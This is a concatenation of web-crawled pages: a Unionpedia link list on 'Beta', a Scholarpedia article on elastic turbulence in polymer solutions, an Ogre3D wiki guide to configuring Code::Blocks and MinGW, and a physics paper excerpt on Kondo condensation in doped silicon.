Corinth (Κόρινθος, Kórinthos) is an ancient city and former municipality in Corinthia, Peloponnese, which is located in south-central Greece.
New!!: Beta and Corinth · See more »
Cursive (also known as script or longhand, among other names) is any style of penmanship in which some characters are written joined together in a flowing manner, generally for the purpose of making writing faster.
New!!: Beta and Cursive · See more »
The Cyclades (Κυκλάδες) are an island group in the Aegean Sea, southeast of mainland Greece and a former administrative prefecture of Greece.
New!!: Beta and Cyclades · See more »
In typography, a descender is the portion of a letter that extends below the baseline of a font.
New!!: Beta and Descender · See more »
Gortyn, Gortys or Gortyna (Γόρτυν, Γόρτυς, or Γόρτυνα) is a municipality and an archaeological site on the Mediterranean island of Crete, 45 km away from the modern capital Heraklion.
New!!: Beta and Gortyn · See more »
The Greek alphabet has been used to write the Greek language since the late 9th or early 8th century BC.
New!!: Beta and Greek alphabet · See more »
Greek numerals, also known as Ionic, Ionian, Milesian, or Alexandrian numerals, are a system of writing numbers using the letters of the Greek alphabet.
New!!: Beta and Greek numerals · See more »
High-definition video is video of higher resolution and quality than standard-definition.
New!!: Beta and High-definition video · See more »
Hurricane Beta was a compact, but intense tropical cyclone that impacted the southwestern Caribbean in late October 2005.
New!!: Beta and Hurricane Beta · See more »
International Phonetic Alphabet
The International Phonetic Alphabet (IPA) is an alphabetic system of phonetic notation based primarily on the Latin alphabet.
New!!: Beta and International Phonetic Alphabet · See more »
,, usually referred to as JVC or The Japan Victor Company, is a Japanese international professional and consumer electronics corporation based in Yokohama.
New!!: Beta and JVC · See more »
Megara (Μέγαρα) is a historic town and a municipality in West Attica, Greece.
New!!: Beta and Megara · See more »
Milos or Melos (Modern Greek: Μήλος; Μῆλος Melos) is a volcanic Greek island in the Aegean Sea, just north of the Sea of Crete.
New!!: Beta and Milos · See more »
Modern Greek (Νέα Ελληνικά or Νεοελληνική Γλώσσα "Neo-Hellenic", historically and colloquially also known as Ρωμαίικα "Romaic" or "Roman", and Γραικικά "Greek") refers to the dialects and varieties of the Greek language spoken in the modern era.
New!!: Beta and Modern Greek · See more »
NTSC, named after the National Television System Committee,National Television System Committee (1951–1953),, 17 v. illus., diagrs., tables.
New!!: Beta and NTSC · See more »
In set theory, an ordinal number, or ordinal, is one generalization of the concept of a natural number that is used to describe a way to arrange a collection of objects in order, one after another.
New!!: Beta and Ordinal number · See more »
The Phoenician alphabet, called by convention the Proto-Canaanite alphabet for inscriptions older than around 1050 BC, is the oldest verified alphabet.
New!!: Beta and Phoenician alphabet · See more »
In statistical modeling, regression analysis is a set of statistical processes for estimating the relationships among variables.
New!!: Beta and Regression analysis · See more »
Romanization of Greek
Romanization of Greek is the transliteration (letter-mapping) or transcription (sound-mapping) of text from the Greek alphabet into the Latin alphabet.
New!!: Beta and Romanization of Greek · See more »
Santorini (Σαντορίνη), classically Thera (English pronunciation), and officially Thira (Greek: Θήρα), is an island in the southern Aegean Sea, about 200 km (120 mi) southeast of Greece's mainland.
New!!: Beta and Santorini · See more »
The Semitic languages are a branch of the Afroasiatic language family originating in the Middle East.
New!!: Beta and Semitic languages · See more »
is a Japanese multinational conglomerate corporation headquartered in Kōnan, Minato, Tokyo.
New!!: Beta and Sony · See more »
In statistics, standardized coefficients or beta coefficients are the estimates resulting from a regression analysis that have been standardized so that the variances of dependent and independent variables are 1.
New!!: Beta and Standardized coefficient · See more »
Type I and type II errors
In statistical hypothesis testing, a type I error is the rejection of a true null hypothesis (also known as a "false positive" finding), while a type II error is failing to reject a false null hypothesis (also known as a "false negative" finding).
New!!: Beta and Type I and type II errors · See more »
Ve (В в; italics: В в) is a letter of the Cyrillic script.
New!!: Beta and Ve (Cyrillic) · See more »
The Video Home System (VHS) is a standard for consumer-level analog video recording on tape cassettes.
New!!: Beta and VHS · See more »
Voiced bilabial fricative
The voiced bilabial fricative is a type of consonantal sound, used in some spoken languages.
New!!: Beta and Voiced bilabial fricative · See more »
Voiced bilabial stop
The voiced bilabial stop is a type of consonantal sound, used in some spoken languages.
New!!: Beta and Voiced bilabial stop · See more »
Voiced labiodental fricative
The voiced labiodental fricative is a type of consonantal sound used in some spoken languages.
New!!: Beta and Voiced labiodental fricative · See more »
2005 Atlantic hurricane season
The 2005 Atlantic hurricane season was the most active Atlantic hurricane season in recorded history, shattering numerous records.
New!!: Beta and 2005 Atlantic hurricane season · See more »
Beta (Greek letter), Beta (Greek), Beta (letter), Beta letter, Curled beta, Latin beta, Vita (letter), \beta, Β, Βήτα, Ꞵ. | <urn:uuid:3bc59dba-69d2-4f8c-8cbc-25522b928e90> | CC-MAIN-2023-14 | https://en.unionpedia.org/Beta | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00604.warc.gz | en | 0.810164 | 2,705 | 3.25 | 3 |
|Victor Steinberg (2008), Scholarpedia, 3(8):5476.||doi:10.4249/scholarpedia.5476||revision #73072 [link to/cite this article]|
Long polymer molecules added to a fluid make it elastic and capable of storing stresses that depend on the history of deformation, thereby providing the fluid a memory. Many properties of the polymer solution flows (especially dilute ones) can be understood on the basis single polymer dynamics where the polymer experiences the combined action of the stretching by the flow and the elastic relaxation. The elastic stress created by the polymer stretching in the flow becomes the main source of nonlinearity in the polymer solution flow at low Reynolds numbers, Re. As the result, an elastic instability shows up, when the elastic energy overcomes the dissipation due to polymer relaxation. The ratio of the nonlinear elastic term to the linear relaxation is defined by the Weissenberg number, Wi. In a simple shear flow of a polymer solution the elastic stress is anisotropic and characterized by the difference in the normal stresses along the flow velocity direction and the velocity gradient direction. In a curvilinear shear flow (e.g. Couette flow between rotating cylinders) the normal stress difference gives rise to a volume force acting on the fluid in the direction of the curvature, the "hoop stress". The latter becomes the driving force for a rod climbing effect as well as an elastic instability. The mechanism of the elastic instability in the Couette flow was first suggested in Ref. and experimentally verified in Ref. . It was also widely investigated in other flow geometries with curvilinear trajectories, including a curvilinear channel. The streamline curvature is necessary ingredient to reduce the critical Weissenberg number for the instability onset, Wic. On the other hand, a possibility of the elastic instability in a straight channel was suggested and studied theoretically and numerically, though its experimental verification is still lacking.
Above the purely elastic instability, a path to a chaotic flow in a form of irregular flow patterns at Wi> Wic was studied in three flow geometries: Couette flow between cylinders, swirling flow between two disks, and flow in a curvilinear channel. It was reasonable to assume that at sufficiently high Wi and vanishingly small Re a random flow, which exhibits continuous velocity spectra in a wide range of temporal and spatial scales similar to a hydrodynamic turbulent flow, can be excited. Indeed, such random flow was observed first in both Couette and swirling flows of dilute polymer solutions and dubbed "elastic turbulence" . It was identified in the swirling flow between two disks due to three main features: sharp growth in flow resistance, algebraic decay of velocity power spectra over a wide range of scales, and orders of magnitude more effective way of mixing than in an ordered flow. These properties are analogous to those of hydrodynamic turbulence. Elastic turbulence in the swirling flow was observed in dilute polymer solutions of various polymer concentrations down to 7 ppm . Since the elastic energy is proportional to the polymer concentration and should exceed dissipation independent of it, one should expect the minimum threshold value of concentration below which elastic turbulence cannot be generated.
However, the similarities do not imply that the physical mechanism that underlies the two kinds of random motion is the same. Indeed, in contrast with inertial turbulence at high Reynolds numbers Re, which occurs due to large Reynolds stresses, large elastic stress is the main source of non-linearity and the cause of elastic turbulence in low Re flows of polymer solutions. One can suggest that in a random flow driven by elasticity, the elastic stress tensor \(\tau\)p should be the object of primary importance and interest, and that it may be appropriate to view elastic turbulence as turbulence of the \(\tau\)p-field. It would then be more relevant and instructive to explore the spatial structure and the temporal distribution of this field. However, currently no experimental technique allows a direct local measurement of the elastic stress in a turbulent flow. On the other hand, properties of the \(\tau\)p-field in a boundary layer were inferred from measurements of injected power, whereas its local properties were evaluated from measurements of spatial and temporal distributions of velocity gradients.
The key early experimental observation is the power-law decay of the velocity power spectra in all flow geometries with the exponent d>3 (between 3.3 and 3.6). Due to the sharp velocity spectrum decay, the velocity and velocity gradient are both determined by the integral scale, i.e., the vessel size. It means that elastic turbulence is essentially a spatially smooth random in time flow, dominated by strong nonlinear interaction of few large-scale modes. This type of random flow appears in hydrodynamic turbulence below the dissipation scale and called Batchelor flow regime. Further characterization of this random flow was conducted by measuring velocity correlation functions via particle image velocimetry.
These early experimental results initiated theoretical studies. On a molecular level, the onset of elastic turbulence is attributed to the occurrence of a coil-stretch transition in the presence of a fluctuating velocity field at Wi>1. A possibility of the polymer stretching in a random flow was suggested and discussed first by Lumley in regards to turbulent drag reduction in hydrodynamic turbulence. The more theory predicts that at Wi>1 a dramatic change in the statistics of polymer stretching takes place, and the majority of molecules become strongly stretched up to the full polymer length . This prediction was experimentally verified recently . The coil-stretch transition has remarkable macroscopic consequences on flow: properties of the polymer solution flow become essentially non-Newtonian. Hydrodynamic description of a polymer solution flow and particularly the dynamics of elastic stresses are analogous to that of a small-scale fast dynamo in magneto-hydrodynamics (MHD) and also of turbulent advection of a passive scalar in the Batchelor regime. The stretching of the magnetic lines is similar to polymer stretching, and the difference with MHD lies in the relaxation term that replaces the diffusion term. In all three cases the basic physics is the same and rather general and directly related to the classical Batchelor regime of mixing: stretching and folding of stress field by a random advecting flow. In elastic turbulence a statistically steady state occurs due to the feedback reaction of stretched polymers (or the elastic stress) on the velocity field that leads to a saturation of \(\tau\)p even for a linear polymer relaxation model. The saturation of \(\tau\)p and therefore the rms of fluctuations of velocity gradients in an unbounded flow of a polymer solution are the key theoretical predictions . The same analysis leads to a power-like decaying spectrum for the elastic stresses and for the velocity field fluctuations with the exponent d>3 in a good accord with the experimental results.
Further experimental studies of elastic turbulence confirm theoretical predictions on the saturation of the rms of velocity gradient (or vorticity) fluctuations in unbounded flow (in a bulk flow) though the saturation level found is several times of that predicted theoretically.
But the main message of the experimental study is a surprising similarity in scaling, statistics, and structure of the elastic stresses and of passive scalar mixing in elastic turbulence in a finite size vessel, in spite of the important difference in the dynamo effect. The latter occurs due to the feedback reaction of stretched polymers (or the elastic stress) on the velocity field.
The experiments also reveal a role of elastic stresses in elastic turbulence due to presence of walls in a von Karman swirling flow between two disks. The following features of elastic turbulence are found experimentally .
- The rms of the velocity gradients (and thus the elastic stress) grows linearly with Wi in the boundary layer, near the driving disk. The rms of the velocity gradients in the boundary layer is one to two orders of magnitude larger than in the bulk suggesting that the elastic stresses are accumulated near the wall and are intermittently injected into the bulk.
- The PDFs of the injected power at either constant angular speed or torque show skewness and exponential tails, which both indicate intermittent statistical behavior. Also the PDFs of the normalized accelerations, which can be related to the statistics of the velocity gradients via the Taylor hypothesis, exhibit well-pronounced exponential tails.
- A new length scale, namely the thickness of the boundary layer, as measured from the profile of the rms of the velocity gradient, is found to be relevant for the boundary layer of the elastic stresses. The velocity boundary layer just reflects some of the features of the boundary layer of the elastic stress (rms of the velocity gradients). The measured length scale is much smaller than the vessel size.
- The scaling of the structure functions of the vorticity, velocity gradients, and injected power is found to be the same as that of a passive scalar advected by the velocity field in elastic turbulence.
These properties provide a basis for a model for the dynamics of elastic turbulence, in which elastic stress is introduced into the fluid by the driving boundary, accumulates in the boundary layer and is intermittently injected into the bulk of the flow. The situation is entirely similar to the trapping of a passive scalar in the mixing boundary layer in a finite size vessel, and to its intermittent injection into the bulk.
The non-uniform distribution of the elastic stress, which causes by non-uniform polymer stretching, is indeed verified experimentally by studying the statistics of a single polymer stretching in an elastic turbulent flow generated by the same polymers. These experiments present for the first time direct elastic stress measurements in a flow and confirm the saturation of the elastic stress in a bulk flow and the existence of boundary layer near the wall . Moreover, al larger polymer concentrations the saturation level decreases and approaches asymptotically the theoretically predicted value that is found for linear polymer elasticity. This result elucidates the relation between two theoretical mechanisms that can lead to the stress saturation: (i) feedback reaction of polymer molecules with linear elasticity on the flow, and (ii) nonlinear elasticity of polymer molecules. At higher polymer concentration, the polymer stretching reduces, and the former mechanism shows up. The concentration dependence of flow structure and of statistics of velocity and velocity gradient fields in a wide range of polymer concentrations from 80 till 3000 ppm also reveals a similar tendency: the larger the concentration, the lower the saturation level of the rms of the velocity gradients. On the other hand, fluctuations of the injected power and pressure fluctuations do not show any concentration dependence in the same range of polymer concentrations either in statistics or in scaling properties of algebraic decay of velocity power spectra and also in average and rms of the velocity fluctuations dependencies on Wi .
Analogous studies in a curvilinear channel flow and direct measurements of velocity gradient statistics by homodyne light scattering techniques are on the way. As the next step in this investigation should be direct measurements of statistics and distribution of elastic stress in elastic turbulence in a macroscopic size vessel.
- R. B. Bird, C. F. Curtiss, R. C. Armstrong, O. Hassager, Dynamics of Polymeric Liquids, (John Wiley, NY), 1987.
- R. G. Larson, E. S. G. Shaqfeh, S. J. Muller, J. Fluid Mech. 218, 573 (1990).
- A. Groisman and V. Steinberg, Phys. Fluids 10, 2451 (1998).
- A. Groisman and V. Steinberg, Nature 405, 53 (2000).
- J. Lumley, Symp. Math. 9, 315 (1972).
- E. Balkovsky, A. Fouxon, and V. Lebedev, Phys. Rev. Lett. 84, 4765 (2000); M.Chertkov, Phys. Rev. Lett. 84, 4761 (2000).
- S. Gerashchenko, C. Chevallard, V. Steinberg, Europhys. Lett. 71, 221(2005).
- A. Fouxon and V. Lebedev, Phys. Fluids 15, 2060 (2003).
- T. Burghelea, E. Segre, V. Steinberg, Phys. Rev. Lett. 96, 214502 (2006), Phys. Fluids 19, 053104 (2007).
- Y. Liu and V. Steinberg, submitted
- Y. Jun and V. Steinberg, submitted.
- James Meiss (2007) Dynamical systems. Scholarpedia, 2(2):1629.
- Giovanni Gallavotti (2008) Fluctuations. Scholarpedia, 3(6):5893.
- Søren Bertil F. Dorch (2007) Magnetohydrodynamics. Scholarpedia, 2(4):2295.
- Howard Eichenbaum (2008) Memory. Scholarpedia, 3(3):1747.
- Cesar A. Hidalgo R. and Albert-Laszlo Barabasi (2008) Scale-free networks. Scholarpedia, 3(1):1716.
- Philip Holmes and Eric T. Shea-Brown (2006) Stability. Scholarpedia, 1(10):1838. | <urn:uuid:2f8628b3-7109-4172-9867-9c9089679307> | CC-MAIN-2023-14 | http://var.scholarpedia.org/article/Turbulence:_elastic | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945440.67/warc/CC-MAIN-20230326075911-20230326105911-00004.warc.gz | en | 0.90575 | 2,808 | 2.515625 | 3 |
Setting Up An Application With Code::Blocks And MinGW
This set of instructions will walk you through setting up a Code::Blocks C++ project from scratch. An alternative to this tutorial is to use the Ogre Application Wizard instead. This tutorial is still useful if you wish to understand what the Application Wizard does for you. When you have finished this tutorial you will be able to compile a working Ogre Application and you will be ready to start the Basic Tutorials.
Table of contents
- Setting up Code::Blocks / MinGW for OGRE Development
- Install the latest MinGW official distribution
- Install Code::Blocks
- Create new Console application project
- Add the Wiki Tutorial Framework
- Project Build Options
- Common Build Options
- Debug Build options
- Release Build options
Install the Ogre SDK as detailed here: Installing the Ogre SDK
Make sure that the environment variable OGRE_HOME is pointing to the root of the Ogre MinGW SDK.
Setting up Code::Blocks / MinGW for OGRE Development
Install the latest MinGW official distribution
OGRE 1.7.2 requires MinGW 4.5. Get it at: http://www.mingw.org/
For instructions on how to install MinGW go to: http://www.mingw.org/wiki/InstallationHOWTOforMinGW
Download the Code::Blocks official release.
It is suggested to download the version that does not come with its own version of MinGW, as it might be incompatible with the one used to compile the Ogre SDK.
Create a directory for it - C:\CodeBlocks - and unzip the three archives into it.
Start Code::Blocks and pick the MinGW compiler from the list of detected build systems.
Goto Settings -> Compiler and Debugger to show the Global compiler settings:
It should be populated properly, but it can't hurt to check.
Also make sure that the MinGW version Code::Blocks uses is the same that was used to compile Ogre.
Do not use the MinGW version that comes with Code::Blocks. It is rather old.
You can find out your version of MinGW by going to "C:\MinGW\lib\gcc\mingw32".
This folder will contain another folder with a version number.
Create new Console application project
Click the 'Create a new project' link in the Code::Blocks start page, or find it in the menu.
Choose 'Console application':
Be sure to put the project in a directory with no spaces in the (full) name.
A good name would be 'C:\Projects\OgreProject':
Add the Wiki Tutorial Framework
Now we need to add some files to the project.Download the Ogre Wiki Tutorial Framework:
Unpack the four files into your new OgreProject directory:
Right-click main.cpp in the project tree and delete it.
Now, we need to add the wiki tutorial framework to our project.
Right-click and Add files recursively...:
You are given a list of four files. Click 'OK' to add them:
Project Build Options
Right-click our OgreProject and choose Build options from the context menu:
Common Build Options
Compiler settings - Other options
Set Compiler settings - Other options to
-mthreads -fmessage-length=0 -fexceptions -fident
Make sure that OgreProject is selected, and not one of the build configurations.
Compiler settings - defines
Set Compiler settings - defines to
Again, make sure that OgreProject is selected, and not one of the build configurations.
Linker settings - Other linker options
Set Linker settings - Other linker options to
-Wl,--enable-auto-image-base -Wl,--add-stdcall-alias -Wl,--enable-auto-import
Again, make sure that OgreProject is selected in the configuration tree.
Search Directories - Compiler
Set Search Directories - Compiler to
$(OGRE_HOME)\include $(OGRE_HOME)\include\OGRE $(OGRE_HOME)\include\OIS $(OGRE_HOME)\boost
It would be prudent to mention that OgreProject should be selected in the configuration tree (and not one of the build configurations)
Search Directories - Linker
Set Search Directories - Linker to
Again, you need to have OgreProject selected, not one of the build configurations!
Debug Build options
Select the Debug build configuration in the configuration selector on the left.
Debug - Compiler settings - defines
Set Debug - Compiler settings - defines to
Debug - Linker settings - Link libraries
Set Debug - Linker settings - Link libraries to
Release Build options
Release - Compiler settings - defines
Set Release - Compiler settings - defines to
Release - Linker settings - Link libraries
Set Release - Linker settings - Link libraries to
Additional libraries when using boost
When you use a version of the Ogre SDK that uses boost, you will need to link against some boost libraries.
For boost 1.50+, these are:
date_time thread system chrono
For previous boost versions, you can ignore system and chrono.
To get the exact file names, have a look at your Ogre SDK folder. If it uses boost, it will contain a "boost" folder which has all needed libraries in "lib" in both debug and release. (Remember to add "$(OGRE_HOME)\boost\lib" to "Search Directories - Linker" if you use boost!)
One filename could be, for example, "libboost_date_time-mgw47-mt-1_51.a", which is a boost 1.51 version compiled with MinGW GCC 4.7.X.
For this, you would have to link against "boost_date_time-mgw47-mt-1_51".
If you want to run your executable from within Code::Blocks, you need to set up 'working directory' and 'command' in the project settings like this:
You should now be able to compile and run your Ogre application.
Well, maybe not until you've copied it to the Ogre sdk bin directory (or take resources.cfg and plugins.cfg from there).
Or by copying Ogre dlls and media..
But that's something for a later wiki article..
Proceed to the Tutorials. | <urn:uuid:9edce2b5-0090-4f22-a883-9ffd738780b1> | CC-MAIN-2023-14 | https://wiki.ogre3d.org/Setting+Up+An+Application+-+CodeBlocks | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945440.67/warc/CC-MAIN-20230326075911-20230326105911-00004.warc.gz | en | 0.786903 | 1,433 | 2.78125 | 3 |
When a magnetic moment is embedded in a metal, it captures nearby itinerant electrons to form a so-called Kondo cloud. When magnetic impurities are sufficiently dense that their individual clouds overlap with each other they are expected to form a correlated electronic ground state. This is known as Kondo condensation and can be considered a magnetic version of Bardeen–Cooper–Schrieffer pair formation. Here, we examine this phenomenon by performing electrical transport and high-precision tunnelling density-of-states spectroscopy measurements in a highly P-doped crystalline silicon metal in which disorder-induced localized magnetic moments exist. We detect the Kondo effect in the resistivity of the Si metal at temperatures below 2 K and an unusual pseudogap in the density of states with gap edge peaks below 100 mK. The pseudogap and peaks are tuned by applying an external magnetic field and transformed into a metallic Altshuler–Aronov gap associated with a paramagnetic disordered Fermi liquid phase. We interpret these observations as evidence of Kondo condensation followed by a transition to a disordered Fermi liquid.
The interplay of electron–electron interactions, disorder and spin correlation in solids is the origin of many competing ground states and phase transitions between them1,2,3, which are typically observed in strongly correlated complex materials ranging from heavy-fermion compounds4 to high-temperature superconductors5,6. An intriguing question in complex interacting systems is how the interactions of microscopic particles lead to macroscopic phenomena such as superconductivity, charge and spin density waves and heavy fermions. The Kondo effect very often plays a central role in understanding the correlated ground states of electron systems and electrical transport (Fig. 1). Doping is a versatile tool with which to address this question because of its ability to control the interaction strength and the way particles interact with each other and with external perturbations such as magnetic fields and pressure7,8.
Here, we report observations of the Kondo interaction and an exotic Bardeen–Cooper–Schrieffer (BCS)-type pseudogap in highly P-doped degenerate silicon (Si:P) with doping concentrations of n ≈ 2−5 × 1019 cm−3 at very low temperatures (Methods). The existence and formation of magnetic moments in metallic Si:P are well understood in terms of Anderson’s picture and well explained in the pioneering works of Bhatt and Lee and others9,10,11,12. Because of the high doping concentration (higher than ~2 × 1019 cm−3), the Fermi energy (EF) in Si:P lies in the conduction band13, as it does in a metal (Supplementary Fig. 4a). In these circumstances, it is very likely that the local moments are entangled with the conduction electrons to form micrometre-sized Kondo clouds14,15 that overlap with each other (Fig. 1b), leading to a correlated ground state in the Si:P metal. In this work, tunnelling density-of-states (DOS) spectroscopy and bulk electrical transport measurements allow the electronic and magnetic nature of competing ground states in the Si:P metal to be explicitly identified and the relevant phase diagram in the temperature–magnetic field (T–B) plane to be constructed.
We first measured the differential resistance Rd of a bulk Si:P metal as a function of T and B. At B = 0 G, Rd exhibited strong temperature dependence at high temperatures (Fig. 2a). As T decreased below approximately 2 K, a clear anomaly appeared as a broadened step-like increase in Rd with decreasing T, and then it decreased slightly below ~1 K. As only a limited temperature range was available, the observed step-like increase is difficult to describe analytically but the ln(T) behaviour (blue line) may be relevant. The temperature dependence of the resistance is reminiscent of that of a Kondo lattice compound with disorder16. The increase in ln(T) and the subsequent decrease in the resistivity of heavy-fermion compounds is attributed to Kondo scattering and the crossover to a coherent state of conduction and localized electrons. A modest magnetic field switches the non-Fermi liquid metal state to a conventional disordered Fermi liquid (DFL), confirming that the observed resistivity anomaly below 2 K is associated with magnetic interactions. On the other hand, the B-dependent Rd at 10 and 77 mK exhibited a small dip in the low-magnetic-field region (Fig. 2b), supporting the presence of the coupling of the local magnetic moments and conducting electrons. A similar magnetoresistance feature is observed in Ce-based heavy-fermion compounds and is attributed to magnetic quantum criticality17.
In fact, the interplay between the competing interactions may switch the ground state of the Si:P metal. The competition between the ground states can be elucidated by observing the evolution of tunnelling DOS spectra near EF of the Si metal at various T and B. For this purpose, we fabricated tunnel junction devices consisting of the Si:P metal with silver (Ag) electrodes separated by a thin SiO2 tunnel barrier for the tunnelling DOS spectroscopy measurements (Fig. 2c and Methods). We also conducted experiments with Al–SiO2–Si:P tunnel junctions that revealed the expected Al superconducting energy gap and proved that tunnelling was the major transport mechanism in such structures. Because Ag behaves similarly to a Fermi liquid with a flat DOS region in the vicinity of EF, the measured differential tunnelling conductance G is directly proportional to the DOS of Si:P: G(V) ∝ DOS(E), where E = EF + eV (V is the voltage across the tunnel barrier and e is the elementary charge). Some of the basic results measured below 200 mK are presented in Fig. 2d,e, which displays the measured G–V characteristics at various temperatures at B = 0 G and an intensity plot of G in the T–V plane, respectively. At T = 18 mK, a partial depletion of the tunnelling DOS near EF, which may be referred to as a pseudogap, is seen in the G–V characteristics near V = 0 V, and anomalous peaks appear outside the pseudogap. As T increases, the depleted DOS within the pseudogap is restored, and the peaks become closer in a nonlinear manner. Above ~160 mK, the U-shaped pseudogap with the side peaks changes into a V1/2-type Altshuler–Aronov gap (also called a zero-bias anomaly (ZBA))18, which is anticipated for metallic bulk Si with disorder and Coulomb correlations in the paramagnetic DFL phase.
Next, we present results that show how the anomalous DOS spectrum at EF varies with B at T = 18 mK. Figure 3a,b presents examples of the measured G–V characteristics at various B below 3,000 G and an intensity plot of G in the B–V plane. As B increases, the peaks become closer together, and the depth and width of the U-shaped pseudogap decrease. Most noticeably, the pseudogap and peaks smoothly change into the Altshuler–Aronov ZBA of the paramagnetic DFL phase. Afterwards, the |V|1/2-dependent G–V curve remains unchanged and independent of B. Interestingly, in the intermediate B region between approximately 1,000 and 2,000 G, G(V) increases linearly as a function of V up to the position of the considerably smaller peaks and then remains constant. Thus, this |V|1-dependent G–V curve has a V-shaped groove, which is distinct from the ZBA. The inset in Fig. 3a shows a comparison of this V-shaped pseudogap and the ZBA. The depth and width of the V-shaped pseudogap continue to decrease with increasing B and T (Supplementary Fig. 5); however, its dependence on B is much weaker than that of the U-shaped pseudogap in the low-B region. We have confirmed that the observed anomalous DOS spectra are not hysteretic in B by sweeping B in both directions. Thus, the observed smooth B-driven phase transition, together with the electrical properties of a bulk Si:P metal, reveal that an exotic magnetically correlated state (which is not generally anticipated in a simple elemental semiconductor) seems to exist in the degenerately doped Si:P metal. T- and B-dependent characteristics of the pseudogap and anomalous peaks are presented in the Supplementary Figs. 6 and 7.
Nonlinear behaviour is observed in the B-dependent restoration of the DOS at EF (G at V = 0 V) at various T from 18 mK to 160 mK. The smooth magnetic phase transition from the magnetic pseudogap phase to the paramagnetic DFL phase is demonstrated in the intensity plot for the zero-bias differential conductance, G(V,B), at 18 mK for each value of B (Supplementary Fig. 8). In the low-T region below approximately 100 mK, the DOS minimum (pseudogap) at EF is reinstated superlinearly with B and then sublinearly up to the value of B (Supplementary Fig. 9a) at which the non-magnetic |V|1/2-dependent ZBA starts to appear in the DFL phase. There exists a clear inflection point (marked with the vertical arrows in the inset of Supplementary Fig. 9a) in the derivative of the G(V = 0 V)–B curve, and we regard this point as the boundary between the superlinear (strongly B-dependent) and sublinear (weakly B-dependent) regions. As T increases, the inflection B point shifts to lower B values, making a boundary in the T–B plane (black diamonds in Supplementary Fig. 9b). The measured tunnelling conductance of Al–SiO2–Si:P devices confirms a strong modification in the DOS near EF of the Si:P metal (Supplementary Fig. 10).
The T–B phase diagram of the Si:P metal shown in Fig. 4 summarizes our main experimental results. Two different phases are clearly visible in the intensity map of the DOS at EF in the T–B plane with an intervening region. The blue region corresponds to the magnetic metal phase where the U-shaped pseudogap and large anomalous DOS peaks outside the gap appear. The black diamonds show the inflection point in the derivative of the G(V = 0 V)–B curve as a function of T. In this phase, the DOS spectrum at EF (G at V = 0 V) changes strongly as B varies. The red stars represent the temperature at which the non-magnetic |V|1/2-type ZBA is detected first, T*, at different B, creating the most important characteristic boundary between the magnetically correlated metal phase and the non-magnetic DFL phase. The magnetic metal phase transforms smoothly into the paramagnetic DFL phase (yellow region) through the intervening weakly magnetic metal phase (green region), where the V-shaped DOS spectrum appears with considerably weaker DOS peaks. In this intervening phase, the depleted DOS at EF is reinstated relatively weakly with increasing B. The boundary consisting of the green circles indicates the temperature at which the anomalous DOS peaks are first detected (TΔ; Supplementary Fig. 6).
Observations of the abnormal electronic DOS spectra in the Si:P metal and their B-driven tuning are very surprising because neither the host Si nor the dopant P show a magnetic order in the crystal structure, and degenerate Si:P is regarded as a metal (EF is located within the conduction band). We ruled out several possible mechanisms that could be responsible for our exotic DOS spectra. First, we ruled out a Coulomb gap scenario because it cannot explain the magnetic behaviour. Second, we ruled out spin glass-type magnetic gaps19 because no noticeable differences were seen between the field-cooled and zero-field-cooled DOS spectra. Neither of these mechanisms can explain the existence of DOS peaks outside the gap or the observed non-Fermi-liquid behaviours in the resistance of bulk Si:P. We also eliminated the possibility of the Kondo lattice gap because the local moments in our sample were randomly distributed. Indeed, our DOS was highly symmetric, while the DOS of the Kondo lattice system has a characteristic asymmetry20. In fact, Si:P is not a heavy-fermion system. Third, the ground state with RKKY interaction-induced magnetic order, for example, the random singlet state (Fig. 1d), is not relevant because it does not have any gap at EF (ref. 21). In addition, the spin density wave caused by the RKKY interaction may produce a BCS-like gap at EF but the preliminary condition for such a mechanism is the lattice translation symmetry, which is absent in our Si metal due to random impurities. Finally, unlike boron (B)-doped degenerate Si (ref. 22), superconductivity has not been observed in P-doped Si and a clear signature of superconductivity (a collapse of the bulk resistance) was not also detected in our Si metal down to 10 mK. However, we do not entirely exclude the occurrence of incipient or hidden superconductivity.
All of the T- and B-dependent bulk transport, the DOS spectroscopy measurements and the existence of magnetic moments suggest that Kondo physics plays a key role in the formation of a correlated electron ground state in the Si:P metal. The underlying physics of the correlation behaviour is proposed here. That is, for a Si:P metal with a doping density of ~3 × 1019 cm−3, more than a 10−5 fraction of the total impurities induce residual, unscreened localized moments9, and the mean distance between the moments is less than 1 μm, which may be comparable to (or even smaller than) the size of a Kondo cloud. Our proposed ground state is the condensation of overlapping Kondo clouds (Fig. 1b), and as a consequence of Kondo condensation, a fraction of itinerant electrons entangled with magnetic impurities are correlated to form a many-body ground state. This Kondo condensation model is analogous to a Bose–Einstein condensate and, similar to BCS Cooper pairs, a singlet ground state with a small BCS-like gap is formed in the DOS at EF. In fact, the shape and behaviour of the observed pseudogap in the Si:P metal is very similar to a BCS-like gap. In the lower doping regime where the metal–insulator transition occurs, this discovered ground state has not been reported. This is presumably because, although the density of magnetic impurities may be higher in this regime, the density of the itinerant electrons captured by the magnetic impurities to form Kondo clouds is not sufficiently high. This is the reason why the observed Kondo phenomenon occurs in the degenerate metal regime, rather than the impurity band regime. To sum up, based on the tunnelling DOS and bulk transport measurements, as well as the fact that magnetic moments are present in the Si:P metal, the proposed microscopic picture responsible for the BCS-like DOS spectrum is Kondo condensation (that is, the overlap of randomly distributed Kondo clouds) and the mechanism for the zero-bias anomaly at elevated temperatures and magnetic fields is electron–electron interaction effects. Thus, the relevant balance between these competing ground states, which leads to a magnetic phase boundary, is controlled by the temperature and magnetic field—as demonstrated by the DOS in the T–B domain.
Understanding many-impurity Kondo physics at a microscopic level remains challenging, especially for disordered solids. In particular, the Kondo effect is a many-body interaction, so it would be inappropriate to apply a single-electron picture. The usual way to tackle the disorder effect is to consider the distribution of the Kondo temperature, which means that the system is described as a sum of independent subsystems with some probability of a given coupling. This is analogous to treating the system as a mixed state, which is an approximation that is only valid when the individual local components of the system (that is, individual Kondo clouds) do not correlate with each other. In such cases, the system can be treated as an ensemble of subsystems with random couplings, thus treating the disorder by summing over the random couplings9. However, the result of such approach is the scaling law in T, which seems to contradict our experimental finding: the observation of the BCS-like pseudogap that is convincing evidence for macroscopic coherence.
